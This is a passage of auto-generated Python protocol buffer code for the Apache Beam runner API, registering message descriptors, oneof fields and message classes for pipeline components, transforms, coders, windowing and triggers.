_SDKFUNCTIONSPEC.fields_by_name['spec'].message_type = _FUNCTIONSPEC
_DISPLAYDATA_IDENTIFIER.containing_type = _DISPLAYDATA
_DISPLAYDATA_ITEM.fields_by_name['id'].message_type = _DISPLAYDATA_IDENTIFIER
_DISPLAYDATA_ITEM.fields_by_name['type'].enum_type = _DISPLAYDATA_TYPE_ENUM
_DISPLAYDATA_ITEM.fields_by_name['value'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_DISPLAYDATA_ITEM.fields_by_name['short_value'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_DISPLAYDATA_ITEM.containing_type = _DISPLAYDATA
_DISPLAYDATA_TYPE.containing_type = _DISPLAYDATA
_DISPLAYDATA_TYPE_ENUM.containing_type = _DISPLAYDATA_TYPE
_DISPLAYDATA.fields_by_name['items'].message_type = _DISPLAYDATA_ITEM
_MESSAGEWITHCOMPONENTS.fields_by_name['components'].message_type = _COMPONENTS
_MESSAGEWITHCOMPONENTS.fields_by_name['coder'].message_type = _CODER
_MESSAGEWITHCOMPONENTS.fields_by_name['combine_payload'].message_type = _COMBINEPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['sdk_function_spec'].message_type = _SDKFUNCTIONSPEC
_MESSAGEWITHCOMPONENTS.fields_by_name['par_do_payload'].message_type = _PARDOPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['ptransform'].message_type = _PTRANSFORM
_MESSAGEWITHCOMPONENTS.fields_by_name['pcollection'].message_type = _PCOLLECTION
_MESSAGEWITHCOMPONENTS.fields_by_name['read_payload'].message_type = _READPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['side_input'].message_type = _SIDEINPUT
_MESSAGEWITHCOMPONENTS.fields_by_name['window_into_payload'].message_type = _WINDOWINTOPAYLOAD
_MESSAGEWITHCOMPONENTS.fields_by_name['windowing_strategy'].message_type = _WINDOWINGSTRATEGY
_MESSAGEWITHCOMPONENTS.fields_by_name['function_spec'].message_type = _FUNCTIONSPEC
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['coder'])
_MESSAGEWITHCOMPONENTS.fields_by_name['coder'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['combine_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['combine_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['sdk_function_spec'])
_MESSAGEWITHCOMPONENTS.fields_by_name['sdk_function_spec'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['par_do_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['par_do_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['ptransform'])
_MESSAGEWITHCOMPONENTS.fields_by_name['ptransform'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['pcollection'])
_MESSAGEWITHCOMPONENTS.fields_by_name['pcollection'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['read_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['read_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['side_input'])
_MESSAGEWITHCOMPONENTS.fields_by_name['side_input'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['window_into_payload'])
_MESSAGEWITHCOMPONENTS.fields_by_name['window_into_payload'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['windowing_strategy'])
_MESSAGEWITHCOMPONENTS.fields_by_name['windowing_strategy'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_MESSAGEWITHCOMPONENTS.oneofs_by_name['root'].fields.append(
_MESSAGEWITHCOMPONENTS.fields_by_name['function_spec'])
_MESSAGEWITHCOMPONENTS.fields_by_name['function_spec'].containing_oneof = _MESSAGEWITHCOMPONENTS.oneofs_by_name['root']
_EXECUTABLESTAGEPAYLOAD_SIDEINPUTID.containing_type = _EXECUTABLESTAGEPAYLOAD
_EXECUTABLESTAGEPAYLOAD_USERSTATEID.containing_type = _EXECUTABLESTAGEPAYLOAD
_EXECUTABLESTAGEPAYLOAD_TIMERID.containing_type = _EXECUTABLESTAGEPAYLOAD
_EXECUTABLESTAGEPAYLOAD.fields_by_name['environment'].message_type = _ENVIRONMENT
_EXECUTABLESTAGEPAYLOAD.fields_by_name['side_inputs'].message_type = _EXECUTABLESTAGEPAYLOAD_SIDEINPUTID
_EXECUTABLESTAGEPAYLOAD.fields_by_name['components'].message_type = _COMPONENTS
_EXECUTABLESTAGEPAYLOAD.fields_by_name['user_states'].message_type = _EXECUTABLESTAGEPAYLOAD_USERSTATEID
_EXECUTABLESTAGEPAYLOAD.fields_by_name['timers'].message_type = _EXECUTABLESTAGEPAYLOAD_TIMERID
DESCRIPTOR.message_types_by_name['BeamConstants'] = _BEAMCONSTANTS
DESCRIPTOR.message_types_by_name['Components'] = _COMPONENTS
DESCRIPTOR.message_types_by_name['Pipeline'] = _PIPELINE
DESCRIPTOR.message_types_by_name['PTransform'] = _PTRANSFORM
DESCRIPTOR.message_types_by_name['StandardPTransforms'] = _STANDARDPTRANSFORMS
DESCRIPTOR.message_types_by_name['StandardSideInputTypes'] = _STANDARDSIDEINPUTTYPES
DESCRIPTOR.message_types_by_name['PCollection'] = _PCOLLECTION
DESCRIPTOR.message_types_by_name['ParDoPayload'] = _PARDOPAYLOAD
DESCRIPTOR.message_types_by_name['Parameter'] = _PARAMETER
DESCRIPTOR.message_types_by_name['StateSpec'] = _STATESPEC
DESCRIPTOR.message_types_by_name['ValueStateSpec'] = _VALUESTATESPEC
DESCRIPTOR.message_types_by_name['BagStateSpec'] = _BAGSTATESPEC
DESCRIPTOR.message_types_by_name['CombiningStateSpec'] = _COMBININGSTATESPEC
DESCRIPTOR.message_types_by_name['MapStateSpec'] = _MAPSTATESPEC
DESCRIPTOR.message_types_by_name['SetStateSpec'] = _SETSTATESPEC
DESCRIPTOR.message_types_by_name['TimerSpec'] = _TIMERSPEC
DESCRIPTOR.message_types_by_name['IsBounded'] = _ISBOUNDED
DESCRIPTOR.message_types_by_name['ReadPayload'] = _READPAYLOAD
DESCRIPTOR.message_types_by_name['WindowIntoPayload'] = _WINDOWINTOPAYLOAD
DESCRIPTOR.message_types_by_name['CombinePayload'] = _COMBINEPAYLOAD
DESCRIPTOR.message_types_by_name['TestStreamPayload'] = _TESTSTREAMPAYLOAD
DESCRIPTOR.message_types_by_name['WriteFilesPayload'] = _WRITEFILESPAYLOAD
DESCRIPTOR.message_types_by_name['Coder'] = _CODER
DESCRIPTOR.message_types_by_name['StandardCoders'] = _STANDARDCODERS
DESCRIPTOR.message_types_by_name['WindowingStrategy'] = _WINDOWINGSTRATEGY
DESCRIPTOR.message_types_by_name['MergeStatus'] = _MERGESTATUS
DESCRIPTOR.message_types_by_name['AccumulationMode'] = _ACCUMULATIONMODE
DESCRIPTOR.message_types_by_name['ClosingBehavior'] = _CLOSINGBEHAVIOR
DESCRIPTOR.message_types_by_name['OnTimeBehavior'] = _ONTIMEBEHAVIOR
DESCRIPTOR.message_types_by_name['OutputTime'] = _OUTPUTTIME
DESCRIPTOR.message_types_by_name['TimeDomain'] = _TIMEDOMAIN
DESCRIPTOR.message_types_by_name['Trigger'] = _TRIGGER
DESCRIPTOR.message_types_by_name['TimestampTransform'] = _TIMESTAMPTRANSFORM
DESCRIPTOR.message_types_by_name['SideInput'] = _SIDEINPUT
DESCRIPTOR.message_types_by_name['Environment'] = _ENVIRONMENT
DESCRIPTOR.message_types_by_name['StandardEnvironments'] = _STANDARDENVIRONMENTS
DESCRIPTOR.message_types_by_name['DockerPayload'] = _DOCKERPAYLOAD
DESCRIPTOR.message_types_by_name['ProcessPayload'] = _PROCESSPAYLOAD
DESCRIPTOR.message_types_by_name['SdkFunctionSpec'] = _SDKFUNCTIONSPEC
DESCRIPTOR.message_types_by_name['FunctionSpec'] = _FUNCTIONSPEC
DESCRIPTOR.message_types_by_name['DisplayData'] = _DISPLAYDATA
DESCRIPTOR.message_types_by_name['MessageWithComponents'] = _MESSAGEWITHCOMPONENTS
DESCRIPTOR.message_types_by_name['ExecutableStagePayload'] = _EXECUTABLESTAGEPAYLOAD
DESCRIPTOR.extensions_by_name['beam_urn'] = beam_urn
DESCRIPTOR.extensions_by_name['beam_constant'] = beam_constant
BeamConstants = _reflection.GeneratedProtocolMessageType('BeamConstants', (_message.Message,), dict(
DESCRIPTOR = _BEAMCONSTANTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.BeamConstants)
))
_sym_db.RegisterMessage(BeamConstants)
Components = _reflection.GeneratedProtocolMessageType('Components', (_message.Message,), dict(
TransformsEntry = _reflection.GeneratedProtocolMessageType('TransformsEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_TRANSFORMSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.TransformsEntry)
))
,
PcollectionsEntry = _reflection.GeneratedProtocolMessageType('PcollectionsEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_PCOLLECTIONSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry)
))
,
WindowingStrategiesEntry = _reflection.GeneratedProtocolMessageType('WindowingStrategiesEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_WINDOWINGSTRATEGIESENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry)
))
,
CodersEntry = _reflection.GeneratedProtocolMessageType('CodersEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_CODERSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.CodersEntry)
))
,
EnvironmentsEntry = _reflection.GeneratedProtocolMessageType('EnvironmentsEntry', (_message.Message,), dict(
DESCRIPTOR = _COMPONENTS_ENVIRONMENTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry)
))
,
DESCRIPTOR = _COMPONENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Components)
))
_sym_db.RegisterMessage(Components)
_sym_db.RegisterMessage(Components.TransformsEntry)
_sym_db.RegisterMessage(Components.PcollectionsEntry)
_sym_db.RegisterMessage(Components.WindowingStrategiesEntry)
_sym_db.RegisterMessage(Components.CodersEntry)
_sym_db.RegisterMessage(Components.EnvironmentsEntry)
Pipeline = _reflection.GeneratedProtocolMessageType('Pipeline', (_message.Message,), dict(
DESCRIPTOR = _PIPELINE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Pipeline)
))
_sym_db.RegisterMessage(Pipeline)
PTransform = _reflection.GeneratedProtocolMessageType('PTransform', (_message.Message,), dict(
InputsEntry = _reflection.GeneratedProtocolMessageType('InputsEntry', (_message.Message,), dict(
DESCRIPTOR = _PTRANSFORM_INPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PTransform.InputsEntry)
))
,
OutputsEntry = _reflection.GeneratedProtocolMessageType('OutputsEntry', (_message.Message,), dict(
DESCRIPTOR = _PTRANSFORM_OUTPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry)
))
,
DESCRIPTOR = _PTRANSFORM,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PTransform)
))
_sym_db.RegisterMessage(PTransform)
_sym_db.RegisterMessage(PTransform.InputsEntry)
_sym_db.RegisterMessage(PTransform.OutputsEntry)
StandardPTransforms = _reflection.GeneratedProtocolMessageType('StandardPTransforms', (_message.Message,), dict(
DESCRIPTOR = _STANDARDPTRANSFORMS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardPTransforms)
))
_sym_db.RegisterMessage(StandardPTransforms)
StandardSideInputTypes = _reflection.GeneratedProtocolMessageType('StandardSideInputTypes', (_message.Message,), dict(
DESCRIPTOR = _STANDARDSIDEINPUTTYPES,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardSideInputTypes)
))
_sym_db.RegisterMessage(StandardSideInputTypes)
PCollection = _reflection.GeneratedProtocolMessageType('PCollection', (_message.Message,), dict(
DESCRIPTOR = _PCOLLECTION,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.PCollection)
))
_sym_db.RegisterMessage(PCollection)
ParDoPayload = _reflection.GeneratedProtocolMessageType('ParDoPayload', (_message.Message,), dict(
SideInputsEntry = _reflection.GeneratedProtocolMessageType('SideInputsEntry', (_message.Message,), dict(
DESCRIPTOR = _PARDOPAYLOAD_SIDEINPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry)
))
,
StateSpecsEntry = _reflection.GeneratedProtocolMessageType('StateSpecsEntry', (_message.Message,), dict(
DESCRIPTOR = _PARDOPAYLOAD_STATESPECSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry)
))
,
TimerSpecsEntry = _reflection.GeneratedProtocolMessageType('TimerSpecsEntry', (_message.Message,), dict(
DESCRIPTOR = _PARDOPAYLOAD_TIMERSPECSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry)
))
,
DESCRIPTOR = _PARDOPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ParDoPayload)
))
_sym_db.RegisterMessage(ParDoPayload)
_sym_db.RegisterMessage(ParDoPayload.SideInputsEntry)
_sym_db.RegisterMessage(ParDoPayload.StateSpecsEntry)
_sym_db.RegisterMessage(ParDoPayload.TimerSpecsEntry)
Parameter = _reflection.GeneratedProtocolMessageType('Parameter', (_message.Message,), dict(
Type = _reflection.GeneratedProtocolMessageType('Type', (_message.Message,), dict(
DESCRIPTOR = _PARAMETER_TYPE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Parameter.Type)
))
,
DESCRIPTOR = _PARAMETER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Parameter)
))
_sym_db.RegisterMessage(Parameter)
_sym_db.RegisterMessage(Parameter.Type)
StateSpec = _reflection.GeneratedProtocolMessageType('StateSpec', (_message.Message,), dict(
DESCRIPTOR = _STATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StateSpec)
))
_sym_db.RegisterMessage(StateSpec)
ValueStateSpec = _reflection.GeneratedProtocolMessageType('ValueStateSpec', (_message.Message,), dict(
DESCRIPTOR = _VALUESTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ValueStateSpec)
))
_sym_db.RegisterMessage(ValueStateSpec)
BagStateSpec = _reflection.GeneratedProtocolMessageType('BagStateSpec', (_message.Message,), dict(
DESCRIPTOR = _BAGSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.BagStateSpec)
))
_sym_db.RegisterMessage(BagStateSpec)
CombiningStateSpec = _reflection.GeneratedProtocolMessageType('CombiningStateSpec', (_message.Message,), dict(
DESCRIPTOR = _COMBININGSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.CombiningStateSpec)
))
_sym_db.RegisterMessage(CombiningStateSpec)
MapStateSpec = _reflection.GeneratedProtocolMessageType('MapStateSpec', (_message.Message,), dict(
DESCRIPTOR = _MAPSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.MapStateSpec)
))
_sym_db.RegisterMessage(MapStateSpec)
SetStateSpec = _reflection.GeneratedProtocolMessageType('SetStateSpec', (_message.Message,), dict(
DESCRIPTOR = _SETSTATESPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.SetStateSpec)
))
_sym_db.RegisterMessage(SetStateSpec)
TimerSpec = _reflection.GeneratedProtocolMessageType('TimerSpec', (_message.Message,), dict(
DESCRIPTOR = _TIMERSPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimerSpec)
))
_sym_db.RegisterMessage(TimerSpec)
IsBounded = _reflection.GeneratedProtocolMessageType('IsBounded', (_message.Message,), dict(
DESCRIPTOR = _ISBOUNDED,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.IsBounded)
))
_sym_db.RegisterMessage(IsBounded)
ReadPayload = _reflection.GeneratedProtocolMessageType('ReadPayload', (_message.Message,), dict(
DESCRIPTOR = _READPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ReadPayload)
))
_sym_db.RegisterMessage(ReadPayload)
WindowIntoPayload = _reflection.GeneratedProtocolMessageType('WindowIntoPayload', (_message.Message,), dict(
DESCRIPTOR = _WINDOWINTOPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WindowIntoPayload)
))
_sym_db.RegisterMessage(WindowIntoPayload)
CombinePayload = _reflection.GeneratedProtocolMessageType('CombinePayload', (_message.Message,), dict(
DESCRIPTOR = _COMBINEPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.CombinePayload)
))
_sym_db.RegisterMessage(CombinePayload)
TestStreamPayload = _reflection.GeneratedProtocolMessageType('TestStreamPayload', (_message.Message,), dict(
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
AdvanceWatermark = _reflection.GeneratedProtocolMessageType('AdvanceWatermark', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermark)
))
,
AdvanceProcessingTime = _reflection.GeneratedProtocolMessageType('AdvanceProcessingTime', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTime)
))
,
AddElements = _reflection.GeneratedProtocolMessageType('AddElements', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElements)
))
,
DESCRIPTOR = _TESTSTREAMPAYLOAD_EVENT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.Event)
))
,
TimestampedElement = _reflection.GeneratedProtocolMessageType('TimestampedElement', (_message.Message,), dict(
DESCRIPTOR = _TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement)
))
,
DESCRIPTOR = _TESTSTREAMPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TestStreamPayload)
))
_sym_db.RegisterMessage(TestStreamPayload)
_sym_db.RegisterMessage(TestStreamPayload.Event)
_sym_db.RegisterMessage(TestStreamPayload.Event.AdvanceWatermark)
_sym_db.RegisterMessage(TestStreamPayload.Event.AdvanceProcessingTime)
_sym_db.RegisterMessage(TestStreamPayload.Event.AddElements)
_sym_db.RegisterMessage(TestStreamPayload.TimestampedElement)
WriteFilesPayload = _reflection.GeneratedProtocolMessageType('WriteFilesPayload', (_message.Message,), dict(
SideInputsEntry = _reflection.GeneratedProtocolMessageType('SideInputsEntry', (_message.Message,), dict(
DESCRIPTOR = _WRITEFILESPAYLOAD_SIDEINPUTSENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry)
))
,
DESCRIPTOR = _WRITEFILESPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WriteFilesPayload)
))
_sym_db.RegisterMessage(WriteFilesPayload)
_sym_db.RegisterMessage(WriteFilesPayload.SideInputsEntry)
Coder = _reflection.GeneratedProtocolMessageType('Coder', (_message.Message,), dict(
DESCRIPTOR = _CODER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Coder)
))
_sym_db.RegisterMessage(Coder)
StandardCoders = _reflection.GeneratedProtocolMessageType('StandardCoders', (_message.Message,), dict(
DESCRIPTOR = _STANDARDCODERS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardCoders)
))
_sym_db.RegisterMessage(StandardCoders)
WindowingStrategy = _reflection.GeneratedProtocolMessageType('WindowingStrategy', (_message.Message,), dict(
DESCRIPTOR = _WINDOWINGSTRATEGY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.WindowingStrategy)
))
_sym_db.RegisterMessage(WindowingStrategy)
MergeStatus = _reflection.GeneratedProtocolMessageType('MergeStatus', (_message.Message,), dict(
DESCRIPTOR = _MERGESTATUS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.MergeStatus)
))
_sym_db.RegisterMessage(MergeStatus)
AccumulationMode = _reflection.GeneratedProtocolMessageType('AccumulationMode', (_message.Message,), dict(
DESCRIPTOR = _ACCUMULATIONMODE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.AccumulationMode)
))
_sym_db.RegisterMessage(AccumulationMode)
ClosingBehavior = _reflection.GeneratedProtocolMessageType('ClosingBehavior', (_message.Message,), dict(
DESCRIPTOR = _CLOSINGBEHAVIOR,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ClosingBehavior)
))
_sym_db.RegisterMessage(ClosingBehavior)
OnTimeBehavior = _reflection.GeneratedProtocolMessageType('OnTimeBehavior', (_message.Message,), dict(
DESCRIPTOR = _ONTIMEBEHAVIOR,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.OnTimeBehavior)
))
_sym_db.RegisterMessage(OnTimeBehavior)
OutputTime = _reflection.GeneratedProtocolMessageType('OutputTime', (_message.Message,), dict(
DESCRIPTOR = _OUTPUTTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.OutputTime)
))
_sym_db.RegisterMessage(OutputTime)
TimeDomain = _reflection.GeneratedProtocolMessageType('TimeDomain', (_message.Message,), dict(
DESCRIPTOR = _TIMEDOMAIN,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimeDomain)
))
_sym_db.RegisterMessage(TimeDomain)
Trigger = _reflection.GeneratedProtocolMessageType('Trigger', (_message.Message,), dict(
AfterAll = _reflection.GeneratedProtocolMessageType('AfterAll', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERALL,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterAll)
))
,
AfterAny = _reflection.GeneratedProtocolMessageType('AfterAny', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERANY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterAny)
))
,
AfterEach = _reflection.GeneratedProtocolMessageType('AfterEach', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTEREACH,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterEach)
))
,
AfterEndOfWindow = _reflection.GeneratedProtocolMessageType('AfterEndOfWindow', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERENDOFWINDOW,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow)
))
,
AfterProcessingTime = _reflection.GeneratedProtocolMessageType('AfterProcessingTime', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERPROCESSINGTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTime)
))
,
AfterSynchronizedProcessingTime = _reflection.GeneratedProtocolMessageType('AfterSynchronizedProcessingTime', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterSynchronizedProcessingTime)
))
,
Default = _reflection.GeneratedProtocolMessageType('Default', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_DEFAULT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Default)
))
,
ElementCount = _reflection.GeneratedProtocolMessageType('ElementCount', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_ELEMENTCOUNT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.ElementCount)
))
,
Never = _reflection.GeneratedProtocolMessageType('Never', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_NEVER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Never)
))
,
Always = _reflection.GeneratedProtocolMessageType('Always', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_ALWAYS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Always)
))
,
OrFinally = _reflection.GeneratedProtocolMessageType('OrFinally', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_ORFINALLY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.OrFinally)
))
,
Repeat = _reflection.GeneratedProtocolMessageType('Repeat', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_REPEAT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Repeat)
))
,
DESCRIPTOR = _TRIGGER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger)
))
_sym_db.RegisterMessage(Trigger)
_sym_db.RegisterMessage(Trigger.AfterAll)
_sym_db.RegisterMessage(Trigger.AfterAny)
_sym_db.RegisterMessage(Trigger.AfterEach)
_sym_db.RegisterMessage(Trigger.AfterEndOfWindow)
